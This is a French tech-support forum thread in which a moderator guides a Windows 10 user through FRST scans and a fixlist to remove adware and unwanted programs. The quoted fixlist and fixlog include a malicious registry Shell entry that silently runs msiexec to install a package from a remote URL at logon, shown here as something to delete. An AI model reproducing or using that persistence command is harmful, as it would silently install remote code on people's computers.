Lenteur pc - programme qui se charge tout seul
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Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 30 avril 2017 à 12:00
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 30 avril 2017 à 12:00
Bonjour,
j'aurais besoin d'aide svp.
je suis windows 10
et depuis quelques temps, je trouve mon pc lent au démarrage, les appli plantent régulièrement (firefox) ou mettent du temps à se charger et j'ai des programmes qui se chargent tout seul (google chrome, yahoo) çà devient fatiguant ...
je me dis que j'ai peut être un virus ....si quelqu'un pouvait m'aider çà serait sympa
j'ai déjà fait tourner adwcleaner, malwarebytes, ccleaner, plus avast ....
merci d'avance pour votre aide
Emmanuelle
j'aurais besoin d'aide svp.
je suis windows 10
et depuis quelques temps, je trouve mon pc lent au démarrage, les appli plantent régulièrement (firefox) ou mettent du temps à se charger et j'ai des programmes qui se chargent tout seul (google chrome, yahoo) çà devient fatiguant ...
je me dis que j'ai peut être un virus ....si quelqu'un pouvait m'aider çà serait sympa
j'ai déjà fait tourner adwcleaner, malwarebytes, ccleaner, plus avast ....
merci d'avance pour votre aide
Emmanuelle
A voir également:
- Lenteur pc - programme qui se charge tout seul
- Lenteur pc - Guide
- Test performance pc - Guide
- Reinitialiser pc - Guide
- Pc qui freeze - Guide
- Audacity enregistrer son pc - Guide
5 réponses
Mathieu770
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23 avril 2017
Modifié le 22 avril 2017 à 10:47
Modifié le 22 avril 2017 à 10:47
Salut ,
Malheureusement il y a beaucoup de problème avec windows 10 , moi même j'en ai.
À la base , ton ordi était sur windows 10 ou tu as fait la mise à jour ?
Malheureusement il y a beaucoup de problème avec windows 10 , moi même j'en ai.
À la base , ton ordi était sur windows 10 ou tu as fait la mise à jour ?
Malekal_morte-
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22 avril 2017 à 11:13
22 avril 2017 à 11:13
Salut,
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
54gedeon54
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30 avril 2017
28 avril 2017 à 18:06
28 avril 2017 à 18:06
salut,
voici les liens
https://pjjoint.malekal.com/files.php?id=FRST_20170422_u5f13w6b15f5
https://pjjoint.malekal.com/files.php?id=20170422_i6y13s11f1111
https://pjjoint.malekal.com/files.php?id=20170422_j15n10n13v12f8
merci d'avance
Emmanuelle
voici les liens
https://pjjoint.malekal.com/files.php?id=FRST_20170422_u5f13w6b15f5
https://pjjoint.malekal.com/files.php?id=20170422_i6y13s11f1111
https://pjjoint.malekal.com/files.php?id=20170422_j15n10n13v12f8
merci d'avance
Emmanuelle
54gedeon54
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30 avril 2017
22 avril 2017 à 16:21
22 avril 2017 à 16:21
salut,
voici les liens
https://pjjoint.malekal.com/files.php?id=FRST_20170422_u5f13w6b15f5
https://pjjoint.malekal.com/files.php?id=20170422_i6y13s11f1111
https://pjjoint.malekal.com/files.php?id=20170422_j15n10n13v12f8
merci d'avance
Emmanuelle
voici les liens
https://pjjoint.malekal.com/files.php?id=FRST_20170422_u5f13w6b15f5
https://pjjoint.malekal.com/files.php?id=20170422_i6y13s11f1111
https://pjjoint.malekal.com/files.php?id=20170422_j15n10n13v12f8
merci d'avance
Emmanuelle
Malekal_morte-
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29 avril 2017 à 09:31
29 avril 2017 à 09:31
Désinstalle :
McAfee Security Scan Plus
McAfee WebAdvisor
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois s'il y a des améliorations
Refais un scan FRST et donne à nouveau les rapports via pjjoint.
McAfee Security Scan Plus
McAfee WebAdvisor
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-11] (Piriform Ltd)
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SMdw2NTqdRjhSNdzQNjwxRWhWOTU4FdVWOTIxFUF3Mc%3D%3D /q [Pays US - 104.24.101.133]
2017-03-25 12:35 - 2017-04-15 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot
2017-03-25 12:35 - 2017-03-25 12:35 - 00000000 ____D C:\Program Files (x86)\ScreenShot
2017-03-25 12:34 - 2017-04-13 17:26 - 00000000 ____D C:\Users\Emmanuelle BASSI\AppData\Roaming\ScreenShot
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois s'il y a des améliorations
Refais un scan FRST et donne à nouveau les rapports via pjjoint.
54gedeon54
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Modifié le 29 avril 2017 à 10:44
Modifié le 29 avril 2017 à 10:44
hello,
voici le fichier fixlog
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 27-04-2017
Exécuté par Emmanuelle BASSI (29-04-2017 10:31:43) Run:1
Exécuté depuis C:\Users\Emmanuelle BASSI\Desktop
Profils chargés: Emmanuelle BASSI (Profils disponibles: Emmanuelle BASSI)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-11] (Piriform Ltd)
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SMdw2NTqdRjhSNdzQNjwxRWhWOTU4FdVWOTIxFUF3Mc%3D%3D /q [Pays US - 104.24.101.133]
2017-03-25 12:35 - 2017-04-15 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot
2017-03-25 12:35 - 2017-03-25 12:35 - 00000000 ____D C:\Program Files (x86)\ScreenShot
2017-03-25 12:34 - 2017-04-13 17:26 - 00000000 ____D C:\Users\Emmanuelle BASSI\AppData\Roaming\ScreenShot
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur non trouvé(e).
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot" => non trouvé(e).
C:\Program Files (x86)\ScreenShot => déplacé(es) avec succès
C:\Users\Emmanuelle BASSI\AppData\Roaming\ScreenShot => déplacé(es) avec succès
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 6053888 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 19967036 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 13821838 B
Edge => 5463 B
Chrome => 0 B
Firefox => 15797033 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 479 B
systemprofile32 => 0 B
LocalService => 830 B
NetworkService => 14532608 B
Emmanuelle BASSI => 46710004 B
RecycleBin => 949 B
EmptyTemp: => 111.5 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
emmanuelle
voici le fichier fixlog
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 27-04-2017
Exécuté par Emmanuelle BASSI (29-04-2017 10:31:43) Run:1
Exécuté depuis C:\Users\Emmanuelle BASSI\Desktop
Profils chargés: Emmanuelle BASSI (Profils disponibles: Emmanuelle BASSI)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9532120 2017-04-11] (Piriform Ltd)
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1SMdw2NTqdRjhSNdzQNjwxRWhWOTU4FdVWOTIxFUF3Mc%3D%3D /q [Pays US - 104.24.101.133]
2017-03-25 12:35 - 2017-04-15 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot
2017-03-25 12:35 - 2017-03-25 12:35 - 00000000 ____D C:\Program Files (x86)\ScreenShot
2017-03-25 12:34 - 2017-04-13 17:26 - 00000000 ____D C:\Users\Emmanuelle BASSI\AppData\Roaming\ScreenShot
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CCleaner Monitoring => valeur supprimé(es) avec succès
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur non trouvé(e).
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot" => non trouvé(e).
C:\Program Files (x86)\ScreenShot => déplacé(es) avec succès
C:\Users\Emmanuelle BASSI\AppData\Roaming\ScreenShot => déplacé(es) avec succès
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-543700338-4044927340-3953065360-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 6053888 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 19967036 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 13821838 B
Edge => 5463 B
Chrome => 0 B
Firefox => 15797033 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 479 B
systemprofile32 => 0 B
LocalService => 830 B
NetworkService => 14532608 B
Emmanuelle BASSI => 46710004 B
RecycleBin => 949 B
EmptyTemp: => 111.5 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 10:33:08
je suis ta procédure et te transmets le reste dès que possibleemmanuelle
Malekal_morte-
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29 avril 2017 à 16:13
29 avril 2017 à 16:13
fais le reste et vois s'il y ad es améliorations.
54gedeon54
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Malekal_morte-
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30 avril 2017 à 09:31
30 avril 2017 à 09:31
hello et merci
effectivement il y a du mieux ....j'ai refait le le first et voici les fichiers
https://pjjoint.malekal.com/files.php?id=FRST_20170430_v8o8i13r11t10
https://pjjoint.malekal.com/files.php?id=20170430_h8h11w7n12t9
https://pjjoint.malekal.com/files.php?id=20170430_b12u12h12j15o11
merci et bonne journée
Emmanuelle
effectivement il y a du mieux ....j'ai refait le le first et voici les fichiers
https://pjjoint.malekal.com/files.php?id=FRST_20170430_v8o8i13r11t10
https://pjjoint.malekal.com/files.php?id=20170430_h8h11w7n12t9
https://pjjoint.malekal.com/files.php?id=20170430_b12u12h12j15o11
merci et bonne journée
Emmanuelle
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Modifié le 30 avril 2017 à 12:01
Modifié le 30 avril 2017 à 12:01
Ca me semble correct =)
Il faudrait désinstaller Intel Security True Key
Ca ne sert à rien.
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
Veuillez appuyer sur une touche pour continuer la désinfection...
Il faudrait désinstaller Intel Security True Key
Ca ne sert à rien.
Supprime le dossier C:\FRST
Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
Quelques conseils :
Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
Veuillez appuyer sur une touche pour continuer la désinfection...
22 avril 2017 à 16:22
à la base windows 8 que j'ai basculé sous 10. çà fonctionnait nickel mais depuis quelques temps c'est plus çà !